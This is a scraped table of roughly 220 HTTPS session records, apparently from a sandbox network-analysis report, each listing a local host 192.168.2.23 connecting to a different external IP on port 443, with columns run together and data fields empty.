                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12581192.168.2.2339082159.109.60.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12582192.168.2.235282674.168.119.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12583192.168.2.2354438123.151.238.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12584192.168.2.2355150189.215.137.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12585192.168.2.2344154153.151.86.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12586192.168.2.234568439.52.192.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12587192.168.2.23465064.111.3.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12588192.168.2.2359186105.152.132.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12589192.168.2.235602499.111.49.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12590192.168.2.235425038.24.46.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12591192.168.2.2354588148.246.153.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12592192.168.2.2347102138.213.252.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12593192.168.2.234691873.36.148.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12594192.168.2.2356522149.154.140.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12595192.168.2.23407548.74.184.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12596192.168.2.2338508120.225.239.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12597192.168.2.235990213.22.36.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12598192.168.2.2334274151.172.205.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12599192.168.2.2351962128.179.84.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12600192.168.2.2339772102.204.113.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12601192.168.2.2335548170.159.3.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12602192.168.2.2337702168.12.223.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12603192.168.2.234843476.165.31.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12604192.168.2.2346498100.30.200.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12605192.168.2.2339660194.120.108.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12606192.168.2.2354336110.107.194.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12607192.168.2.235425489.161.207.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12608192.168.2.2347714151.176.130.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12609192.168.2.233447681.219.213.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12610192.168.2.234221235.113.177.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12611192.168.2.2349470191.76.77.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12612192.168.2.2345722145.68.93.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12613192.168.2.2348108154.220.243.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12614192.168.2.23365704.179.145.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12615192.168.2.2358564135.217.58.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12616192.168.2.2354506202.147.35.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12617192.168.2.235384257.88.121.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12618192.168.2.2339986221.100.230.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12619192.168.2.2346684177.118.195.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12620192.168.2.234135673.144.215.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12621192.168.2.235593042.15.201.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12622192.168.2.2335694204.77.160.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12623192.168.2.2353020155.163.247.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12624192.168.2.2345804123.106.197.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12625192.168.2.2336188170.246.105.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12626192.168.2.2338538166.144.254.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12627192.168.2.233402846.62.62.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12628192.168.2.2359586165.73.60.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12629192.168.2.2344298159.26.196.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12630192.168.2.2347064108.218.194.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12631192.168.2.234262038.133.43.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12632192.168.2.234415496.255.132.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12633192.168.2.2345160163.154.90.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12634192.168.2.234771654.177.100.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12635192.168.2.2359872113.213.36.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12636192.168.2.2344968186.90.112.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12637192.168.2.2347550151.162.233.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12638192.168.2.234227888.220.64.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12639192.168.2.234683046.64.141.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12640192.168.2.2356600103.107.78.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12641192.168.2.234251864.60.226.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12642192.168.2.2346440194.116.76.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12643192.168.2.233408844.135.195.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12644192.168.2.233729066.210.194.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12645192.168.2.23432161.211.250.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12646192.168.2.2337750190.143.31.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12647192.168.2.2334086191.204.223.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12648192.168.2.2337710137.2.225.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12649192.168.2.23396624.46.200.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12650192.168.2.235039836.92.173.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12651192.168.2.2342470133.138.160.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12652192.168.2.235501493.147.180.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12653192.168.2.235254660.227.201.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12654192.168.2.2346912180.49.225.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12655192.168.2.235623293.53.248.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12656192.168.2.2348054185.195.103.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12657192.168.2.2355614139.3.249.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12658192.168.2.2347234204.220.2.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12659192.168.2.2335152144.234.175.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12660192.168.2.2336896111.127.196.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12661192.168.2.2353950206.173.84.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12662192.168.2.23350325.53.215.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12663192.168.2.234648470.60.18.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12664192.168.2.233750892.226.61.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12665192.168.2.233630092.136.225.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12666192.168.2.2332804180.232.6.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12667192.168.2.2360984208.161.5.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12668192.168.2.234324868.32.101.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12669192.168.2.2352834176.10.104.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12670192.168.2.2355708167.117.241.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12671192.168.2.2345178199.154.99.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12672192.168.2.2338836124.171.129.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12673192.168.2.235553060.245.41.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12674192.168.2.2343818173.107.97.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12675192.168.2.233617873.68.204.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12676192.168.2.234809436.146.36.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12677192.168.2.2333384186.93.254.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12678192.168.2.2339404216.146.2.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12679192.168.2.23459204.162.124.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12680192.168.2.2353356194.119.164.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12681192.168.2.2335362177.228.12.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12682192.168.2.2346872197.107.172.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12683192.168.2.2349002169.9.158.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12684192.168.2.2358548134.82.162.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12685192.168.2.2350300176.197.121.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12686192.168.2.236020496.153.237.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12687192.168.2.235474086.24.167.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12688192.168.2.2346350102.126.208.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12689192.168.2.233623453.79.170.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12690192.168.2.233877632.46.110.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12691192.168.2.2342792219.209.48.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12692192.168.2.2355382131.52.133.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12693192.168.2.2344110213.52.39.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12694192.168.2.235869242.142.107.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12695192.168.2.2356476162.135.40.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12696192.168.2.234452879.236.154.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12697192.168.2.235891463.69.59.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12698192.168.2.235896063.169.11.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12699192.168.2.2355726182.82.139.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12700192.168.2.2348040191.192.186.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12701192.168.2.234911865.203.196.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12702192.168.2.2353192153.107.8.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12703192.168.2.23361724.72.161.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12704192.168.2.234167689.23.220.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12705192.168.2.233649663.68.90.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12706192.168.2.2355120122.237.55.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12707192.168.2.234006444.83.48.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12708192.168.2.2340782153.70.62.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12709192.168.2.2340160180.16.158.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12710192.168.2.2335950136.48.115.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12711192.168.2.2353006112.147.212.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12712192.168.2.2347206163.113.210.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12713192.168.2.2358652221.186.204.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12714192.168.2.2349608196.249.243.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12715192.168.2.2357478142.251.206.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12716192.168.2.2345496199.53.249.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12717192.168.2.235034668.53.218.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12718192.168.2.234829447.5.179.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12719192.168.2.234271872.149.213.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12720192.168.2.2360688176.101.163.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12721192.168.2.2360686193.65.42.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12722192.168.2.23509404.85.168.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12723192.168.2.2350614190.202.108.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12724192.168.2.2336258103.143.46.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12725192.168.2.2334702147.139.95.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12726192.168.2.2343786150.244.135.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12727192.168.2.2350742131.12.107.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12728192.168.2.2352720190.8.64.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12729192.168.2.2360102177.171.226.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12730192.168.2.2335190150.73.96.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12731192.168.2.2348310181.16.144.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12732192.168.2.235735873.205.34.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12733192.168.2.234592866.175.31.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12734192.168.2.2340378155.167.31.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12735192.168.2.233330497.91.213.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12736192.168.2.2354462188.57.52.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12737192.168.2.2351786219.6.192.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12738192.168.2.2343986130.76.140.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12739192.168.2.2357952163.27.196.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12740192.168.2.2347172107.104.55.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12741192.168.2.233892262.28.0.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12742192.168.2.2334024128.198.94.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12743192.168.2.2351430141.87.60.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12744192.168.2.2351716164.155.121.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12745192.168.2.2342610145.134.220.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12746192.168.2.2339264203.19.219.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12747192.168.2.2350204110.78.126.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12748192.168.2.234249838.49.218.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12749192.168.2.2344908192.75.176.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12750192.168.2.235197678.211.80.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12751192.168.2.2334756202.205.11.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12752192.168.2.2336702179.186.66.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12753192.168.2.233494663.166.93.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12754192.168.2.234343217.229.149.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12755192.168.2.2351424140.65.50.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12756192.168.2.2341186213.41.220.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12757192.168.2.2350932207.14.252.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12758192.168.2.2340900181.199.168.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12759192.168.2.2333748110.229.125.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12760192.168.2.2334102126.123.42.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12761192.168.2.235840648.156.179.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12762192.168.2.2354230141.193.84.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12763192.168.2.234789641.2.23.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12764192.168.2.2340288102.22.64.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12765192.168.2.2358838117.126.181.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12766192.168.2.2337070176.123.116.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12767192.168.2.236079868.228.125.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12768192.168.2.234424681.133.112.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12769192.168.2.2344000200.184.53.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12770192.168.2.2356310122.40.13.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12771192.168.2.235644638.194.17.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12772192.168.2.233510620.44.14.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12773192.168.2.2342624123.118.220.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12774192.168.2.233426872.20.84.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12775192.168.2.2354680175.198.123.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12776192.168.2.2335620189.238.12.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12777192.168.2.2332792135.173.12.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12778192.168.2.2334080172.155.83.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12779192.168.2.2358874173.102.111.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12780192.168.2.2339340198.63.9.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12781192.168.2.2341476152.235.231.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12782192.168.2.2333356155.123.73.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12783192.168.2.236016848.160.173.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12784192.168.2.234578242.153.213.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12785192.168.2.235380451.138.211.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12786192.168.2.2351760170.125.32.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12787192.168.2.2355050169.117.92.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12788192.168.2.235876693.8.108.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12789192.168.2.235600874.19.85.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12790192.168.2.233841469.70.254.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12791192.168.2.2352490204.137.98.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12792192.168.2.2346122147.48.95.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12793192.168.2.2340620173.28.69.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12794192.168.2.2345626189.19.164.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12795192.168.2.23594025.70.66.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12796192.168.2.2340090107.21.83.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12797192.168.2.2360128169.207.229.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12798192.168.2.2346152175.54.37.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12799192.168.2.2351130221.46.183.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12800192.168.2.235722685.81.74.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12801192.168.2.2360920138.95.244.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12802192.168.2.234783840.165.255.52443
